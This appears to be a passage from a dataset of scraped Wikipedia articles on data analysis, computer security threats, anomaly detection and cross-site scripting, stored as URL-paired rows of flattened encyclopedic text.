Hence, it is possible to detect tightly coupled Trojans via measurement of these analog signals. The measured values can be used as a signature for the analyzed device. It is also common that a set of measured values is evaluated to avoid measurement errors or other inaccuracies. 9 |
438 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Data_analysis | Data analysis is the process of inspecting, cleansing, transforming, and modeling data with the goal of discovering useful information, informing conclusions, and supporting decision-making. 1 Data analysis has multiple facets and approaches, encompassing diverse techniques under a variety of names, and is used in different business, science, and social science domains. 2 In today's business world, data analysis plays a role in making decisions more scientific and helping businesses operate more effectively. 3 Data mining is a particular data analysis technique that focuses on statistical modeling and knowledge discovery for predictive rather than purely descriptive purposes, while business intelligence covers data analysis that relies heavily on aggregation, focusing mainly on business information. 4 In statistical applications, data analysis can be divided into descriptive statistics, exploratory data analysis (EDA), and confirmatory data analysis (CDA). 5 EDA focuses on discovering new features in the data while CDA focuses on confirming or falsifying existing hypotheses. 6 7 Predictive analytics focuses on the application of statistical models for predictive forecasting or classification, while text analytics applies statistical, linguistic, and structural techniques to extract and classify information from textual sources, a species of unstructured data. All of the above are varieties of data analysis. 8 Data integration is a precursor to data analysis, and data analysis is closely linked to data visualization and data dissemination. 9 Analysis refers to dividing a whole into its separate components for individual examination. 10 Data analysis is a process for obtaining raw data, and subsequently converting it into information useful for decision-making by users. 1 Data is collected and analyzed to answer questions, test hypotheses, or disprove theories. 11 Statistician John Tukey, defined data analysis in 1961, as: "Procedures for analyzing data, techniques for interpreting the results of such procedures, ways of planning the gathering of data to make its analysis easier, more precise or more accurate, and all the machinery and results of (mathematical) statistics which apply to analyzing data. 12 There are several phases that can be distinguished, described below. The phases are iterative, in that feedback from later phases may result in additional work in earlier phases. 13 The CRISP framework, used in data mining, has similar steps. The data is necessary as inputs to the analysis, which is specified based upon the requirements of those directing the analytics (or customers, who will use the finished product of the analysis). 14 15 The general type of entity upon which the data will be collected is referred to as an experimental unit (e.g., a person or population of people). Specific variables regarding a population (e.g., age and income) may be specified and obtained. Data may be numerical or categorical (i.e., a text label for numbers). 13 Data is collected from a variety of sources. 16 17 A list of data sources are available for study research. The requirements may be communicated by analysts to custodians of the data; such as, Information Technology personnel within an organization. 18 Data collection or data gathering is the process of gathering and measuring information on targeted variables in an established system, which then enables one to answer relevant questions and evaluate outcomes. The data may also be collected from sensors in the environment, including traffic cameras, satellites, recording devices, etc. It may also be obtained through interviews, downloads from online sources, or reading documentation. 13 Data, when initially obtained, must be processed or organized for analysis. 19 20 For instance, these may involve placing data into rows and columns in a table format (known as structured data) for further analysis, often through the use of spreadsheet or statistical software. 13 Once processed and organized, the data may be incomplete, contain duplicates, or contain errors. 21 22 The need for data cleaning will arise from problems in the way that the datum are entered and stored. 21 Data cleaning is the process of preventing and correcting these errors. Common tasks include record matching, identifying inaccuracy of data, overall quality of existing data, deduplication, and column segmentation. 23 Such data problems can also be identified through a variety of analytical techniques. For example; with financial information, the totals for particular variables may be compared against separately published numbers that are believed to be reliable. 24 25 Unusual amounts, above or below predetermined thresholds, may also be reviewed. There are several types of data cleaning, that are dependent upon the type of data in the set; this could be phone numbers, email addresses, employers, or other values. 26 27 Quantitative data methods for outlier detection, can be used to get rid of data that appears to have a higher likelihood of being input incorrectly. 28 Textual data spell checkers can be used to lessen the amount of mistyped words. However, it is harder to tell if the words themselves are correct. 29 Once the datasets are cleaned, they can then be analyzed. Analysts may apply a variety of techniques, referred to as exploratory data analysis, to begin understanding the messages contained within the obtained data. 30 The process of data exploration may result in additional data cleaning or additional requests for data; thus, the initialization of the iterative phases mentioned in the lead paragraph of this section. 31 Descriptive statistics, such as, the average or median, can be generated to aid in understanding the data. 32 33 Data visualization is also a technique used, in which the analyst is able to examine the data in a graphical format in order to obtain additional insights, regarding the messages within the data. 13 Mathematical formulas or models (also known as algorithms), may be applied to the data in order to identify relationships among the variables; for example, using correlation or causation. 34 35 In general terms, models may be developed to evaluate a specific variable based on other variable(s) contained within the dataset, with some residual error depending on the implemented model's accuracy (e.g., Data Model Error). 36 11 Inferential statistics includes utilizing techniques that measure the relationships between particular variables. 37 For example, regression analysis may be used to model whether a change in advertising (independent variable X), provides an explanation for the variation in sales (dependent variable Y). 38 In mathematical terms, Y (sales) is a function of X (advertising). 39 It may be described as (Y aX b error), where the model is designed such that (a) and (b) minimize the error when the model predicts Y for a given range of values of X. 40 Analysts may also attempt to build models that are descriptive of the data, in an aim to simplify analysis and communicate results. 11 A data product is a computer application that takes data inputs and generates outputs, feeding them back into the environment. 41 It may be based on a model or algorithm. For instance, an application that analyzes data about customer purchase history, and uses the results to recommend other purchases the customer might enjoy. 42 13 Once data is analyzed, it may be reported in many formats to the users of the analysis to support their requirements. 44 The users may have feedback, which results in additional analysis. As such, much of the analytical cycle is iterative. 13 When determining how to communicate the results, the analyst may consider implementing a variety of data visualization techniques to help communicate the message more clearly and efficiently to the audience. 45 Data visualization uses information displays (graphics such as, tables and charts) to help communicate key messages contained in the data. 46 Tables are a valuable tool by enabling the ability of a user to query and focus on specific numbers; while charts (e.g., bar charts or line charts), may help explain the quantitative messages contained in the data. 47 Stephen Few described eight types of quantitative messages that users may attempt to understand or communicate from a set of data and the associated graphs used to help communicate the message. 48 Customers specifying requirements and analysts performing the data analysis may consider these messages during the course of the process. 49 Author Jonathan Koomey has recommended a series of best practices for understanding quantitative data. 60 These include: For the variables under examination, analysts typically obtain descriptive statistics for them, such as the mean (average), median, and standard deviation. 61 They may also analyze the distribution of the key variables to see how the individual values cluster around the mean. 62 The consultants at McKinsey and Company named a technique for breaking a quantitative problem down into its component parts called the MECE principle. 63 Each layer can be broken down into its components; each of the sub-components must be mutually exclusive of each other and collectively add up to the layer above them. 64 The relationship is referred to as "Mutually Exclusive and Collectively Exhaustive" or MECE. For example, profit by definition can be broken down into total revenue and total cost. 65 In turn, total revenue can be analyzed by its components, such as the revenue of divisions A, B, and C (which are mutually exclusive of each other) and should add to the total revenue (collectively exhaustive). 66 Analysts may use robust statistical measurements to solve certain analytical problems. 67 Hypothesis testing is used when a particular hypothesis about the true state of affairs is made by the analyst and data is gathered to determine whether that state of affairs is true or false. 68 69 For example, the hypothesis might be that "Unemployment has no effect on inflation", which relates to an economics concept called the Phillips Curve. 70 Hypothesis testing involves considering the likelihood of Type I and type II errors, which relate to whether the data supports accepting or rejecting the hypothesis. 71 72 Regression analysis may be used when the analyst is trying to determine the extent to which independent variable X affects dependent variable Y (e.g., "To what extent do changes in the unemployment rate (X) affect the inflation rate (Y)? ). 73 This is an attempt to model or fit an equation line or curve to the data, such that Y is a function of X. 74 75 Necessary condition analysis (NCA) may be used when the analyst is trying to determine the extent to which independent variable X allows variable Y (e.g., "To what extent is a certain unemployment rate (X) necessary for a certain inflation rate (Y)? ). 73 Whereas (multiple) regression analysis uses additive logic where each X-variable can produce the outcome and the X's can compensate for each other (they are sufficient but not necessary), 76 necessary condition analysis (NCA) uses necessity logic, where one or more X-variables allow the outcome to exist, but may not produce it (they are necessary but not sufficient). Each single necessary condition must be present and compensation is not possible. 77 Users may have particular data points of interest within a data set, as opposed to the general messaging outlined above. Such low-level user analytic activities are presented in the following table. The taxonomy can also be organized by three poles of activities: retrieving values, finding data points, and arranging data points. 78 79 80 81 - How long is the movie Gone with the Wind? - What comedies have won awards? - Which funds underperformed the SP 500? - What is the gross income of all stores combined? - How many manufacturers of cars are there? - What director film has won the most awards? - What Marvel Studios film has the most recent release date? - Rank the cereals by calories. - What is the range of car horsepowers? - What actresses are in the data set? - What is the age distribution of shoppers? - Are there any outliers in protein? - Is there a cluster of typical film lengths? - Is there a correlation between country of origin and MPG? - Do different genders have a preferred payment method? - Is there a trend of increasing film length over the years? Barriers to effective analysis may exist among the analysts performing the data analysis or among the audience. Distinguishing fact from opinion, cognitive biases, and innumeracy are all challenges to sound data analysis. 82 You are entitled to your own opinion, but you are not entitled to your own facts. Daniel Patrick Moynihan Effective analysis requires obtaining relevant facts to answer questions, support a conclusion or formal opinion, or test hypotheses. 83 84 Facts by definition are irrefutable, meaning that any person involved in the analysis should be able to agree upon them. 85 For example, in August 2010, the Congressional Budget Office (CBO) estimated that extending the Bush tax cuts of 2001 and 2003 for the 2011 2020 time period would add approximately $3.3 trillion to the national debt. 86 Everyone should be able to agree that indeed this is what CBO reported; they can all examine the report. This makes it a fact. Whether persons agree or disagree with the CBO is their own opinion. 87 As another example, the auditor of a public company must arrive at a formal opinion on whether financial statements of publicly traded corporations are "fairly stated, in all material respects". 88 This requires extensive analysis of factual data and evidence to support their opinion. When making the leap from facts to opinions, there is always the possibility that the opinion is erroneous. 89 There are a variety of cognitive biases that can adversely affect analysis. For example, confirmation bias is the tendency to search for or interpret information in a way that confirms one's preconceptions. 90 In addition, individuals may discredit information that does not support their views. 91 Analysts may be trained specifically to be aware of these biases and how to overcome them. 92 In his book Psychology of Intelligence Analysis, retired CIA analyst Richards Heuer wrote that analysts should clearly delineate their assumptions and chains of inference and specify the degree and source of the uncertainty involved in the conclusions. 93 He emphasized procedures to help surface and debate alternative points of view. 94 Effective analysts are generally adept with a variety of numerical techniques. However, audiences may not have such literacy with numbers or numeracy; they are said to be innumerate. 95 Persons communicating the data may also be attempting to mislead or misinform, deliberately using bad numerical techniques. 96 For example, whether a number is rising or falling may not be the key factor. More important may be the number relative to another number, such as the size of government revenue or spending relative to the size of the economy (GDP) or the amount of cost relative to revenue in corporate financial statements. 97 This numerical technique is referred to as normalization 25 or common-sizing. There are many such techniques employed by analysts, whether adjusting for inflation (i.e., comparing real vs. nominal data) or considering population increases, demographics, etc. 98 Analysts apply a variety of techniques to address the various quantitative messages described in the section above. 99 Analysts may also analyze data under different assumptions or scenario. For example, when analysts perform financial statement analysis, they will often recast the financial statements under different assumptions to help arrive at an estimate of future cash flow, which they then discount to present value based on some interest rate, to determine the valuation of the company or its stock. 100 101 Similarly, the CBO analyzes the effects of various policy options on the government's revenue, outlays and deficits, creating alternative future scenarios for key measures. 102 A data analytics approach can be used in order to predict energy consumption in buildings. 103 The different steps of the data analysis process are carried out in order to realise smart buildings, where the building management and control operations including heating, ventilation, air conditioning, lighting and security are realised automatically by miming the needs of the building users and optimising resources like energy and time. 104 Analytics is the "extensive use of data, statistical and quantitative analysis, explanatory and predictive models, and fact-based management to drive decisions and actions. It is a subset of business intelligence, which is a set of technologies and processes that uses data to understand and analyze business performance to drive decision-making . 105 In education, most educators have access to a data system for the purpose of analyzing student data. 106 These data systems present data to educators in an over-the-counter data format (embedding labels, supplemental documentation, and a help system and making key package display and content decisions) to improve the accuracy of educators’ data analyses. 107 This section contains rather technical explanations that may assist practitioners but are beyond the typical scope of a Wikipedia article. 108 The most important distinction between the initial data analysis phase and the main analysis phase, is that during initial data analysis one refrains from any analysis that is aimed at answering the original research question. 109 The initial data analysis phase is guided by the following four questions: 110 The quality of the data should be checked as early as possible. Data quality can be assessed in several ways, using different types of analysis: frequency counts, descriptive statistics (mean, standard deviation, median), normality (skewness, kurtosis, frequency histograms), normal imputation is needed. 111 The choice of analyses to assess the data quality during the initial data analysis phase depends on the analyses that will be conducted in the main analysis phase. 114 The quality of the measurement instruments should only be checked during the initial data analysis phase when this is not the focus or research question of the study. 115 116 One should check whether structure of measurement instruments corresponds to structure reported in the literature. There are two ways to assess measurement quality: After assessing the quality of the data and of the measurements, one might decide to impute missing data, or to perform initial transformations of one or more variables, although this can also be done during the main analysis phase. 119 Possible transformations of variables are: 120 One should check the success of the randomization procedure, for instance by checking whether background and substantive variables are equally distributed within and across groups. 121 If the study did not need or use a randomization procedure, one should check the success of the non-random sampling, for instance by checking whether all subgroups of the population of interest are represented in sample. 122 Other possible data distortions that should be checked are: In any report or article, the structure of the sample must be accurately described. 124 125 It is especially important to exactly determine the structure of the sample (and specifically the size of the subgroups) when subgroup analyses will be performed during the main analysis phase. 126 The characteristics of the data sample can be assessed by looking at: During the final stage, the findings of the initial data analysis are documented, and necessary, preferable, and possible corrective actions are taken. 128 Also, the original plan for the main data analyses can and should be specified in more detail or rewritten. 129 In order to do this, several decisions about the main data analyses can and should be made: Several analyses can be used during the initial data analysis phase: 131 It is important to take the measurement levels of the variables into account for the analyses, as special statistical techniques are available for each level: 132 Nonlinear analysis is often necessary when the data is recorded from a nonlinear system. Nonlinear systems can exhibit complex dynamic effects including bifurcations, chaos, harmonics and subharmonics that cannot be analyzed using simple linear methods. Nonlinear data analysis is closely related to nonlinear system identification. 133 In the main analysis phase, analyses aimed at answering the research question are performed as well as any other relevant analysis needed to write the first draft of the research report. 134 In the main analysis phase, either an exploratory or confirmatory approach can be adopted. Usually the approach is decided before data is collected. 135 In an exploratory analysis no clear hypothesis is stated before analysing the data, and the data is searched for models that describe the data well. 136 In a confirmatory analysis clear hypotheses about the data are tested. 137 Exploratory data analysis should be interpreted carefully. When testing multiple models at once there is a high chance on finding at least one of them to be significant, but this can be due to a type 1 error. 138 It is important to always adjust the significance level when testing multiple models with, for example, a Bonferroni correction. 139 Also, one should not follow up an exploratory analysis with a confirmatory analysis in the same dataset. 140 An exploratory analysis is used to find ideas for a theory, but not to test that theory as well. 140 When a model is found exploratory in a dataset, then following up that analysis with a confirmatory analysis in the same dataset could simply mean that the results of the confirmatory analysis are due to the same type 1 error that resulted in the exploratory model in the first place. 140 The confirmatory analysis therefore will not be more informative than the original exploratory analysis. 141 It is important to obtain some indication about how generalizable the results are. 142 While this is often difficult to check, one can look at the stability of the results. Are the results reliable and reproducible? There are two main ways of doing that. 143 Notable free software for data analysis include: The typical data analysis workflow involves collecting data, running analyses through various scripts, creating visualizations, and writing reports. However, this workflow presents challenges, including a separation between analysis scripts and data, as well as a gap between analysis and documentation. Often, the correct order of running scripts is only described informally or resides in the data scientist's memory. The potential for losing this information creates issues for reproducibility. To address these challenges, it is essential to have analysis scripts written for automated, reproducible workflows. Additionally, dynamic documentation is crucial, providing reports that are understandable by both machines and humans, ensuring accurate representation of the analysis workflow even as scripts evolve. 150 Different companies or organizations hold data analysis contests to encourage researchers to utilize their data or to solve a particular question using data analysis. 151 152 A few examples of well-known international data analysis contests are as follows: 153 |
439 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Threat_(computer) | In computer security, a threat is a potential negative action or event enabled by a vulnerability that results in an unwanted impact to a computer system or application. A threat can be either a negative "intentional" event (i.e. hacking: an individual cracker or a criminal organization) or an "accidental" negative event (e.g. the possibility of a computer malfunctioning, or the possibility of a natural disaster event such as an earthquake, a fire, or a tornado) or otherwise a circumstance, capability, action, or event (incident is often used as a blanket term). 1 A threat actor who is an individual or group that can perform the threat action, such as exploiting a vulnerability to actualise a negative impact. An exploit is a vulnerability that a threat actor used to cause an incident. A more comprehensive definition, tied to an Information assurance point of view, can be found in "Federal Information Processing Standards (FIPS) 200, Minimum Security Requirements for Federal Information and Information Systems" by NIST of United States of America 2 National Information Assurance Glossary defines threat as: ENISA gives a similar definition: 3 The Open Group defines threat as: 4 Factor analysis of information risk defines threat as: 5 National Information Assurance Training and Education Center gives a more articulated definition of threat: 6 7 The term "threat" relates to some other basic security terms as shown in the following diagram: 1 A resource (both physical or logical) can have one or more vulnerabilities that can be exploited by a threat agent in a threat action. The result can potentially compromise the confidentiality, integrity or availability properties of resources (potentially different than the vulnerable one) of the organization and others involved parties (customers, suppliers). The so-called CIA triad is the basis of information security. The attack can be active when it attempts to alter system resources or affect their operation: so it compromises Integrity or Availability. A "passive attack" attempts to learn or make use of information from the system but does not affect system resources: so it compromises Confidentiality. 1 OWASP (see figure) depicts the same phenomenon in slightly different terms: a threat agent through an attack vector exploits a weakness (vulnerability) of the system and the related security controls causing a technical impact on an IT resource (asset) connected to a business impact. A set of policies concerned with information security management, the Information security management systems (ISMS), has been developed to manage, according to risk management principles, the countermeasures in order to accomplish to a security strategy set up following rules and regulations applicable in a country. Countermeasures are also called security controls; when applied to the transmission of information are named security services. 8 The overall picture represents the risk factors of the risk scenario. 9 The widespread of computer dependencies and the consequent raising of the consequence of a successful attack, led to a new term cyberwarfare. Nowadays the many real attacks exploit Psychology at least as much as technology. Phishing and Pretexting and other methods are called social engineering techniques. 10 The Web 2.0 applications, specifically Social network services, can be a mean to get in touch with people in charge of system administration or even system security, inducing them to reveal sensitive information. 11 One famous case is Robin Sage. 12 The most widespread documentation on computer insecurity is about technical threats such as a computer virus, trojan and other malware, but a serious study to apply cost effective countermeasures can only be conducted following a rigorous IT risk analysis in the framework of an ISMS: a pure technical approach will let out the psychological attacks that are increasing threats. Threats can be classified according to their type and origin: 13 Note that a threat type can have multiple origins. Recent trends in computer threats show an increase in ransomware attacks, supply chain attacks, and fileless malware. Ransomware attacks involve the encryption of a victim's files and a demand for payment to restore access. Supply chain attacks target the weakest links in a supply chain to gain access to high-value targets. Fileless malware attacks use techniques that allow malware to run in memory, making it difficult to detect. 14 Below are the few common emerging threats: Computer viruses Trojan horses Worms Rootkits Spyware Adware Ransomware Fileless malware Microsoft published a mnemonic, STRIDE, 15 from the initials of threat groups: Microsoft previously rated the risk of security threats using five categories in a classification called DREAD: Risk assessment model. The model is considered obsolete by Microsoft. The categories were: The DREAD name comes from the initials of the five categories listed. The spread over a network of threats can lead to dangerous situations. In military and civil fields, threat level has been defined: for example INFOCON is a threat level used by the US. Leading antivirus software vendors publish global threat level on their websites. 16 17 The term Threat Agent is used to indicate an individual or group that can manifest a threat. It is fundamental to identify who would want to exploit the assets of a company, and how they might use them against the company. 18 Individuals within a threat population; Practically anyone and anything can, under the right circumstances, be a threat agent the well-intentioned, but inept, computer operator who trashes a daily batch job by typing the wrong command, the regulator performing an audit, or the squirrel that chews through a data cable. 5 Threat agents can take one or more of the following actions against an asset: 5 Each of these actions affects different assets differently, which drives the degree and nature of loss. For example, the potential for productivity loss resulting from a destroyed or stolen asset depends upon how critical that asset is to the organization's productivity. If a critical asset is simply illicitly accessed, there is no direct productivity loss. Similarly, the destruction of a highly sensitive asset that does not play a critical role in productivity would not directly result in a significant productivity loss. Yet that same asset, if disclosed, can result in significant loss of competitive advantage or reputation, and generate legal costs. The point is that it is the combination of the asset and type of action against the asset that determines the fundamental nature and degree of loss. Which action(s) a threat agent takes will be driven primarily by that agent's motive (e.g., financial gain, revenge, recreation, etc.) and the nature of the asset. For example, a threat agent bent on financial gain is less likely to destroy a critical server than they are to steal an easily pawned asset like a laptop. 5 It is important to separate the concept of the event that a threat agent get in contact with the asset (even virtually, i.e. through the network) and the event that a threat agent act against the asset. 5 OWASP collects a list of potential threat agents to prevent system designers, and programmers insert vulnerabilities in the software. 18 Threat Agent Capabilities Intentions Past Activities These individuals and groups can be classified as follows: 18 Threat sources are those who wish a compromise to occur. It is a term used to distinguish them from threat agents actors who are those who carry out the attack and who may be commissioned or persuaded by the threat source to knowingly or unknowingly carry out the attack. 19 Threat action is an assault on system security. A complete security architecture deals with both intentional acts (i.e. attacks) and accidental events. 20 Various kinds of threat actions are defined as subentries under "threat consequence". Threat analysis is the analysis of the probability of occurrences and consequences of damaging actions to a system. 1 It is the basis of risk analysis. Threat modeling is a process that helps organizations identify and prioritize potential threats to their systems. It involves analyzing the system's architecture, identifying potential threats, and prioritizing them based on their impact and likelihood. By using threat modeling, organizations can develop a proactive approach to security and prioritize their resources to address the most significant risks. 21 Threat intelligence is the practice of collecting and analyzing information about potential and current threats to an organization. This information can include indicators of compromise, attack techniques, and threat actor profiles. By using threat intelligence, organizations can develop a better understanding of the threat landscape and improve their ability to detect and respond to threats. 22 Threat consequence is a security violation that results from a threat action. 1 Includes disclosure, deception, disruption, and usurpation. The following subentries describe four kinds of threat consequences, and also list and describe the kinds of threat actions that cause each consequence. 1 Threat actions that are accidental events are marked by . A collection of threats in a particular domain or context, with information on identified vulnerable assets, threats, risks, threat actors and observed trends. 23 24 Threats should be managed by operating an ISMS, performing all the IT risk management activities foreseen by laws, standards and methodologies. Very large organizations tend to adopt business continuity management plans in order to protect, maintain and recover business-critical processes and systems. Some of these plans are implemented by computer security incident response team (CSIRT). Threat management must identify, evaluate, and categorize threats. There are two primary methods of threat assessment: Many organizations perform only a subset of these methods, adopting countermeasures based on a non-systematic approach, resulting in computer insecurity. Information security awareness is a significant market. There has been a lot of software developed to deal with IT threats, including both open-source software and proprietary software. 25 Threat management involves a wide variety of threats including physical threats like flood and fire. While ISMS risk assessment process does incorporate threat management for cyber threats such as remote buffer overflows the risk assessment process doesn't include processes such as threat intelligence management or response procedures. Cyber threat management (CTM) is emerging as the best practice for managing cyber threats beyond the basic risk assessment found in ISMS. It enables early identification of threats, data-driven situational awareness, accurate decision-making, and timely threat mitigating actions. 26 CTM includes: Cyber threat hunting is "the process of proactively and iteratively searching through networks to detect and isolate advanced threats that evade existing security solutions. 27 This is in contrast to traditional threat management measures, such as firewalls, intrusion detection systems, and SIEMs, which typically involve an investigation after there has been a warning of a potential threat, or an incident has occurred. Threat hunting can be a manual process, in which a security analyst sifts through various data information using their knowledge and familiarity with the network to create hypotheses about potential threats. To be even more effective and efficient, however, threat hunting can be partially automated, or machine-assisted, as well. In this case, the analyst utilizes software that harnesses machine learning and user and entity behaviour analytics (UEBA) to inform the analyst of potential risks. The analyst then investigates these potential risks, tracking suspicious behaviour in the network. Thus hunting is an iterative process, meaning that it must be continuously carried out in a loop, beginning with a hypothesis. There are three types of hypotheses: The analyst researches their hypothesis by going through vast amounts of data about the network. The results are then stored so that they can be used to improve the automated portion of the detection system and to serve as a foundation for future hypotheses. The SANS Institute has conducted research and surveys on the effectiveness of threat hunting to track and disrupt cyber adversaries as early in their process as possible. According to a survey performed in 2019, "61% of the respondents report at least an 11% measurable improvement in their overall security posture" and 23.6% of the respondents have experienced a 'significant improvement' in reducing the dwell time. 29 To protect yourself from computer threats, it's essential to keep your software up-to-date, use strong and unique passwords, and be cautious when clicking on links or downloading attachments. Additionally, using antivirus software and regularly backing up your data can help mitigate the impact of a threat. |
440 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Anomaly_detection | In data analysis, anomaly detection (also referred to as outlier detection and sometimes as novelty detection) is generally understood to be the identification of rare items, events or observations which deviate significantly from the majority of the data and do not conform to a well defined notion of normal behavior. 1 Such examples may arouse suspicions of being generated by a different mechanism, 2 or appear inconsistent with the remainder of that set of data. 3 Anomaly detection finds application in many domains including cybersecurity, medicine, machine vision, statistics, neuroscience, law enforcement and financial fraud to name only a few. Anomalies were initially searched for clear rejection or omission from the data to aid statistical analysis, for example to compute the mean or standard deviation. They were also removed to better predictions from models such as linear regression, and more recently their removal aids the performance of machine learning algorithms. However, in many applications anomalies themselves are of interest and are the observations most desirous in the entire data set, which need to be identified and separated from noise or irrelevant outliers. Three broad categories of anomaly detection techniques exist. 1 Supervised anomaly detection techniques require a data set that has been labeled as "normal" and "abnormal" and involves training a classifier. However, this approach is rarely used in anomaly detection due to the general unavailability of labelled data and the inherent unbalanced nature of the classes. Semi-supervised anomaly detection techniques assume that some portion of the data is labelled. This may be any combination of the normal or anomalous data, but more often than not, the techniques construct a model representing normal behavior from a given normal training data set, and then test the likelihood of a test instance to be generated by the model. Unsupervised anomaly detection techniques assume the data is unlabelled and are by far the most commonly used due to their wider and relevant application. Many attempts have been made in the statistical and computer science communities to define an anomaly. The most prevalent ones include the following, and can be categorised into three groups: those that are ambiguous, those that are specific to a method with pre-defined thresholds usually chosen empirically, and those that are formally defined: In this big data era, the focus is increasingly on methodologies capable of handling the complexity and scale of data, going beyond traditional approaches to define and detect anomalies in a way that is both effective and efficient for today's data-driven decision-making processes. 4 The concept of intrusion detection, a critical component of anomaly detection, has evolved significantly over time. Initially, it was a manual process where system administrators would monitor for unusual activities, such as a vacationing user's account being accessed or unexpected printer activity. This approach was not scalable and was soon superseded by the analysis of audit logs and system logs for signs of malicious behavior. 5 By the late 1970s and early 1980s, the analysis of these logs was primarily used retrospectively to investigate incidents, as the volume of data made it impractical for real-time monitoring. The affordability of digital storage eventually led to audit logs being analyzed online, with specialized programs being developed to sift through the data. These programs, however, were typically run during off-peak hours due to their computational intensity. 5 The 1990s brought the advent of real-time intrusion detection systems capable of analyzing audit data as it was generated, allowing for immediate detection of and response to attacks. This marked a significant shift towards proactive intrusion detection. 5 As the field has continued to develop, the focus has shifted to creating solutions that can be efficiently implemented across large and complex network environments, adapting to the ever-growing variety of security threats and the dynamic nature of modern computing infrastructures. 5 Anomaly detection is applicable in a very large number and variety of domains, and is an important subarea of unsupervised machine learning. As such it has applications in cyber-security, intrusion detection, fraud detection, fault detection, system health monitoring, event detection in sensor networks, detecting ecosystem disturbances, defect detection in images using machine vision, medical diagnosis and law enforcement. 6 Anomaly detection was proposed for intrusion detection systems (IDS) by Dorothy Denning in 1986. 7 Anomaly detection for IDS is normally accomplished with thresholds and statistics, but can also be done with soft computing, and inductive learning. 8 Types of features proposed by 1999 included profiles of users, workstations, networks, remote hosts, groups of users, and programs based on frequencies, means, variances, covariances, and standard deviations. 9 The counterpart of anomaly detection in intrusion detection is misuse detection. Anomaly detection is vital in fintech for fraud prevention. 10 11 Preprocessing data to remove anomalies can be an important step in data analysis, and is done for a number of reasons. Statistics such as the mean and standard deviation are more accurate after the removal of anomalies, and the visualisation of data can also be improved. In supervised learning, removing the anomalous data from the dataset often results in a statistically significant increase in accuracy. 12 13 Anomaly detection has become increasingly vital in video surveillance to enhance security and safety. 14 15 With the advent of deep learning technologies, methods using Convolutional Neural Networks (CNNs) and Simple Recurrent Units (SRUs) have shown significant promise in identifying unusual activities or behaviors in video data. 14 These models can process and analyze extensive video feeds in real-time, recognizing patterns that deviate from the norm, which may indicate potential security threats or safety violations. 14 In IT infrastructure management, anomaly detection is crucial for ensuring the smooth operation and reliability of services. 16 Techniques like the IT Infrastructure Library (ITIL) and monitoring frameworks are employed to track and manage system performance and user experience. 16 Detection anomalies can help identify and pre-empt potential performance degradations or system failures, thus maintaining productivity and business process effectiveness. 16 Anomaly detection is critical for the security and efficiency of Internet of Things (IoT) systems. 17 It helps in identifying system failures and security breaches in complex networks of IoT devices. 17 The methods must manage real-time data, diverse device types, and scale effectively. Garbe et al. 18 have introduced a multi-stage anomaly detection framework that improves upon traditional methods by incorporating spatial clustering, density-based clustering, and locality-sensitive hashing. This tailored approach is designed to better handle the vast and varied nature of IoT data, thereby enhancing security and operational reliability in smart infrastructure and industrial IoT systems. 18 Anomaly detection is crucial in the petroleum industry for monitoring critical machinery. 19 Mart et al. used a novel segmentation algorithm to analyze sensor data for real-time anomaly detection. 19 This approach helps promptly identify and address any irregularities in sensor readings, ensuring the reliability and safety of petroleum operations. 19 In the oil and gas sector, anomaly detection is not just crucial for maintenance and safety, but also for environmental protection. 20 Aljameel et al. propose an advanced machine learning-based model for detecting minor leaks in oil and gas pipelines, a task traditional methods may miss. 20 Many anomaly detection techniques have been proposed in literature. 1 21 The performance of methods usually depend on the data sets. For example, some may be suited to detecting local outliers, while others global, and methods have little systematic advantages over another when compared across many data sets. 22 23 Almost all algorithms also require the setting of non-intuitive parameters critical for performance, and usually unknown before application. Some of the popular techniques are mentioned below and are broken down into categories: Dynamic networks, such as those representing financial systems, social media interactions, and transportation infrastructure, are subject to constant change, making anomaly detection within them a complex task. Unlike static graphs, dynamic networks reflect evolving relationships and states, requiring adaptive techniques for anomaly detection. Many of the methods discussed above only yield an anomaly score prediction, which often can be explained to users as the point being in a region of low data density (or relatively low density compared to the neighbor's densities). In explainable artificial intelligence, the users demand methods with higher explainability. Some methods allow for more detailed explanations: |
441 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Special:WhatLinksHere/Web_scraping | The following pages link to Web scraping Showing 50 items. |
442 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Cross-site_scripting | Cross-site scripting (XSS) is a type of security vulnerability that can be found in some web applications. XSS attacks enable attackers to inject client-side scripts into web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same-origin policy. During the second half of 2007, XSSed documented 11,253 site-specific cross-site vulnerabilities, compared to 2,134 "traditional" vulnerabilities documented by Symantec. 1 XSS effects vary in range from petty nuisance to significant security risk, depending on the sensitivity of the data handled by the vulnerable site and the nature of any security mitigation implemented by the site's owner network. OWASP considers the term cross-site scripting to be a misnomer. It initially was an attack that was used for breaching data across sites, but gradually started to include other forms of data injection attacks. 2 Security on the web depends on a variety of mechanisms, including an underlying concept of trust known as the same-origin policy. This states that if content from one site (such as https: mybank.example1.com) is granted permission to access resources (like cookies etc.) on a web browser, then content from any URL with the same (1) URI scheme (e.g. ftp, http, or https), (2) host name, and (3) port number will share these permissions. Content from URLs where any of these three attributes are different will have to be granted permissions separately. 3 Cross-site scripting attacks use known vulnerabilities in web-based applications, their servers, or the plug-in systems on which they rely. Exploiting one of these, attackers fold malicious content into the content being delivered from the compromised site. When the resulting combined content arrives at the client-side web browser, it has all been delivered from the trusted source, and thus operates under the permissions granted to that system. By finding ways of injecting malicious scripts into web pages, an attacker can gain elevated access-privileges to sensitive page content, to session cookies, and to a variety of other information maintained by the browser on behalf of the user. Cross-site scripting attacks are a case of code injection. Microsoft security-engineers introduced the term "cross-site scripting" in January 2000. 4 The expression "cross-site scripting" originally referred to the act of loading the attacked, third-party web application from an unrelated attack-site, in a manner that executes a fragment of JavaScript prepared by the attacker in the security context of the targeted domain (taking advantage of a reflected or non-persistent XSS vulnerability). The definition gradually expanded to encompass other modes of code injection, including persistent and non-JavaScript vectors (including ActiveX, Java, VBScript, Flash, or even HTML scripts), causing some confusion to newcomers to the field of information security. 5 XSS vulnerabilities have been reported and exploited since the 1990s. Prominent sites affected in the past include the social-networking sites Twitter 6 and Facebook. 7 Cross-site scripting flaws have since surpassed buffer overflows to become the most common publicly reported security vulnerability, 8 with some researchers in 2007 estimating as many as 68% of websites are likely open to XSS attacks. 9 There is no single, standardized classification of cross-site scripting flaws, but 